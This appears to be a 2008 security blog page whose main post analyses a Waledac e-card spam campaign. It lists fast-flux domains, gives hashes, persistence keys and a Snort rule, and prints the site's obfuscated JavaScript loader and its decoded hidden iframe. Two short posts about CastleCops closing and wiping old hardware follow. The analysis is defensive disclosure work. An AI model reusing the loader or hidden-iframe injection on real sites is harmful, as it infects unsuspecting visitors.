Wednesday, December 31, 2008

Fast Flux Greeting Card Spam

Over the last several days my mail drops have been receiving several New Year and Christmas related greeting cards. It appears that these are all from the same group:
Thomas just mailed to you a Christmas Postcard. Your card will be available at:
http:// newyearcardonline. com/?cardnum=e830b6884376991e6a6960068c0a
Blessings to you from the ecards-gallery.com
(spaces added to protect from accidental clicks)

When visiting the site, you're greeted with a jpeg image as a web link. Any clicking on the jpeg will prompt you to download postcard.exe (or ecard.exe).


(snapshot taken on 12/30/2008 by DISOG)

The domains used by this group include:
bestchristmascard.com
bestyearcard.com
blackchristmascard.com
cardnewyear.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
justchristmasgift.com
livechristmascard.com
livechristmasgift.com
mirabellaclub.com
mirabellaonline.com
newlifeyearsite.com
newmediayearguide.com
newyearcardcompany.com
newyearcardfree.com
newyearcardonline.com
newyearcardservice.com
seocom.mobi
superchristmasday.com
superchristmaslights.com
superyearcard.com
themirabelladirect.com
themirabellahome.com
whitewhitechristmas.com
yourchristmaslights.com
yourdecember.com
youryearcard.com

The fast flux domains are registered with paycenter.com.cn. out of China. Whois Information on those domains is posted here. Paycenter.com.cn is known to host several phishing related domains as well.

The site inclues a one line javascript,
var kMIkfQBFc6XycsDCpstUGgN2IlVDNTr=Array(63,20,3,46,23,58,41,45,44,0,0,0,0,0,0,0,21,14,
22,25,40,47,34,7,15,4,10,42,55,30,48,49,28,29,5,27,51,8,2,19,53,1,59,0,0,0,0,9,0,37,6,32,50,16,57,
36,12,61,62,39,35,13,31,18,52,60,33,54,26,24,43,38,17,11,56),FDThSyHWyj0O6kV=
"CdqN4Whd94DX4ShwGsPpx4ikJKDX9vqNJEqFy2PpJJ8d_G8FbkhTbZqF@EPXtVqO@
sqrRtQpPkhNuMuNhSQX_WhLn38dy2qrSw6FhHqXIlhNSV",C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ
=0,XSyj5GuMgbyK7p=0,mIFBLKV3Me0q4pIPy3U2w=0,idxbfk_aWcRW7,opFx77WKnhL60Qr83=
FDThSyHWyj0O6kV.length,jQTi=1024; window.status=' '; for(var eMURVlsMortMi3PphMd=Math.ceil(opFx77WKnhL60Qr83/jQTi);eMURVlsMortMi3PphMd>0;eMURVlsMortMi3PphMd--){idxbfk_aWcRW7='';
for(var BLgQQyHi=Math.min(opFx77WKnhL60Qr83,jQTi);BLgQQyHi>0;BLgQQyHi--,opFx77WKnhL60Qr83--){C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ|=(kMIkfQBFc6XycsDCpstUGgN2IlVDNTr[FDThSyHWyj0O6kV.charCodeAt(mIFBLKV3Me0q4pIPy3U2w++)-48])<>=8;XSyj5GuMgbyK7p-=2} else XSyj5GuMgbyK7p=6}document.write(idxbfk_aWcRW7);}

When decoded that says:
<iframe src="http:// seofon. net/gold /click.pnp?eb0h" style="display:none"></iframe>
At this time, that site returns a "Forbidden" page.

The binary, postcard.exe has an MD5 hash of 31a8756b48576862e6312bdc063fa94. It is packed with UPX. When unpacked, it has the MD5 hash of 9f70846b6461cb881228bced7918f991.

Virus Total reports only 16 vendors catch this trojan:
File postcard.exe received on 12.31.2008 15:23:46 (CET)
AntivirusVersionLast UpdateResult
a-squared---
AhnLab-V3---
AntiVir--TR/Proxy.Gen
Authentium--W32/Downloader.F.gen!Eldorado
Avast---
AVG--Downloader.Generic_r.CL
BitDefender---
CAT-QuickHeal---
ClamAV---
Comodo---
DrWeb--Trojan.DownLoad.26732
eSafe--Suspicious File
eTrust-Vet---
Ewido---
F-Prot--W32/Downloader.F.gen!Eldorado
F-Secure--Suspicious:W32/Malware!Gemini
Fortinet--suspicious
GData---
Ikarus--Trojan.Win32.Waledac
K7AntiVirus---
Kaspersky---
McAfee---
McAfee+Artemis--Generic!Artemis
Microsoft--Trojan:Win32/Waledac.A
NOD32--a variant of Win32/Waledac
Norman---
Panda--Suspicious file
PCTools---
Prevx1---
Rising---
SecureWeb-Gateway--Trojan.Proxy.Gen
Sophos--Sus/Spy-B
Sunbelt---
Symantec--W32.Waledac
TheHacker---
TrendMicro---
VBA32---
ViRobot---
VirusBuster---

Additional information
MD5: 31a8756b48576862e6312bdc063fa94b
SHA1: b463b6d251a26a86a1f1472d6dbc0d953f4b4d5c
SHA256: 9fd8ae4b3bf5dcc239a3ea97e113683d1eb3ce564987109ccbeb2b2565c47d15
SHA512: f436e13c9b6886b5ea5367d906d10f3f6ad596b969f205f7ceab5bcc9a1f6044e5a08a2c74ab6e09071c86f8c8fc9fcb661920e34f0208fae663ad44f9a813d6

The binary contains a self signed certificate:
-----BEGIN CERTIFICATE-----
MIICxTCCAi6gAwIBAgIJALvFkWML/1R5MA0GCSqGSIb3DQEBBQUAMEwxCzAJBgNV
BAYTAkdCMRIwEAYDVQQIEwlCZXJrc2hpcmUxEDAOBgNVBAcTB05ld2J1cnkxFzAV
BgNVBAoTDk15IENvbXBhbnkgTHRkMB4XDTA3MTAyMTIwMTE0OFoXDTA3MTEyMDIw
MTE0OFowTDELMAkGA1UEBhMCR0IxEjAQBgNVBAgTCUJlcmtzaGlyZTEQMA4GA1UE
BxMHTmV3YnVyeTEXMBUGA1UEChMOTXkgQ29tcGFueSBMdGQwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAJ90+vC7isUhKB8oAzMB/wmE/ypICLU2o1nr8gVlSJC8
ZXYBIE1OAziASYadAJtN0Av6KW0su3Dh8GIJy7zJBP+i094w4Yy2B0pjtLr9g2Ng
nWwFGt/0GjEagemMayf6ADUtKiE3pGG9JrRiKC99TX31AJsjYSM3qsL4Q8lTITLJ
AgMBAAGjga4wgaswHQYDVR0OBBYEFC9d9isQdTjn6UnsfY0jzn1GM14QMHwGA1Ud
IwR1MHOAFC9d9isQdTjn6UnsfY0jzn1GM14QoVCkTjBMMQswCQYDVQQGEwJHQjES
MBAGA1UECBMJQmVya3NoaXJlMRAwDgYDVQQHEwdOZXdidXJ5MRcwFQYDVQQKEw5N
eSBDb21wYW55IEx0ZIIJALvFkWML/1R5MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcN
AQEFBQADgYEAWYphFm/bi5HP7hmPEGt8j0JfxcvW8P1Wt2XCopO8GiwSOUnRFCCa
m+PIYZnuTSQMHOfQCjoCD2Ih+jEGu+bOpcHCly/Erd7swHo5WcGhFqpyyiTQt1Jj
bbDdKRpbzuY1pp1LxfwsoEadUi8wZ8HtIrg5tmd6J1IBkXh9e4z0rvk=
-----END CERTIFICATE-----
(/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd), It posts encrypted data to http:// mirabellaclub.com/ using the referer "Mozilla" which is highly unusual and could be used as a Snort signature to identify infected hosts:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"2009 Holiday Greeting Spam - Unusual Referer String (Mozilla)"; flow:to_server,established; content:"Referer\: Mozilla"; nocase; classtype:trojan-activity; sid:999999;)
The binary creates a registry key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" which is used to launch the binary from the saved location (in my case, I placed it on the desktop).

This file does not install in the system directories, and auto restarts on reboot. This means even users who run with standard user privileges can become infected and join the botnet. If the binary is run as a normal user, the registry key is placed under "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg".

I started mapping the FastFlux IP's and came up with about 150 unique ip addresses, which is available here.

Update 1: More information is available here:

http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
and here: http://isc.sans.org/diary.html?storyid=5557
and here: http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/

Update 2: Shadowserver has posted a great write up here:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231

Labels: , , ,

posted by Nicholas at 14:18 0 Comments

Thursday, December 25, 2008

CastleCops has gone offline

I was pointed to the CastleCops website today, where I found this message:

Greetings Folks,

You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.

With respect to the server marathon, by March 17 2009 CastleCops will refund contributions made through PayPal that were specifically designated for servers. Unfortunately, server donations made via check cannot be returned because we do not have the addresses for the donating entity. Unless instructed otherwise, CastleCops will re-allocate these funds as a donation to the Internet Systems Consortium (ISC.org). This organization sponsored our hosting environment for approximately the past 2 years. Please contact us [cc at laudanski dot com] before March 17, 2009, if you would like a return of your server marathon donation. Otherwise, we would like to thank the ISC for their unfettered support.

We thank everyone in creating our unique footprint and memories in time.

Love, Best Wishes and Happy Holidays, CastleCops
PST 23 Dec 2008

CastleCops Phishing Incident Response Team and Malware Incident Response Team have been very useful resources. This group will be missed. Best of luck to their team.

Labels:

posted by Nicholas at 03:37 0 Comments

Christmas Hardware

Seasons greetings everyone. I'm sure that more than a few of you will be receiving new hardware this time of year.

I was strolling through Sears to buy that gift for my wife, and noticed that 4 gig PNY USB Thumb Drives were about 15 dollars. Computers are cheaper, and nearly every 10 year old child has a smart phone. Many children will be unwrapping new game consoles, parents and grandparents will get picture frames - nearly everyone I know is expecting some sort of computer related hardware.

Internet Storm Center has released their yearly word of caution and I concure with their statements.

With that said, I'd like to focus on properly disposing of your old gear.

Many of us post our pictures, password files (You do use Password Safe, right?), financial spreadsheets, resume', and other confidential data. Even if you don't store such data, you may have residual emails, cookies, images, and other sensitive documents on those old digital devices.

I'd like everyone's commitment to securely wipe all of their old hard drives, usb thumb drives, smart phones, pdas, flash cards and shred old unneeded backup CD's. It takes a little time, but could save lots of hassel or embarrasement in the future. Many wiping solutions are free, so there is no excuse not to use them.

For Windows Users, you can securely remove single files, directories and clear slack space using Eraser.
For Linux Users, use Wipe.
For old hard drives, a triple pass wipe with DBAN Boot and Nuke should take care of any casual recovery software.
CD's should be shredded using a device approved for shredding CD's and DVDs. Cheap shredders are generally $25-$30.

Once wiped, consider donating used computer equipment to a worth while charity. I saw a program on Street Teens the other night. In this example, donated computers were used to help teens find work; can you even get a job without applying online anymore?

Nursing and retirement homes are always in need of second hand digital gear, including MP3 players and picture frames!

Enjoy a happy Christmas!

Labels: , , , ,

posted by Nicholas at 02:29 0 Comments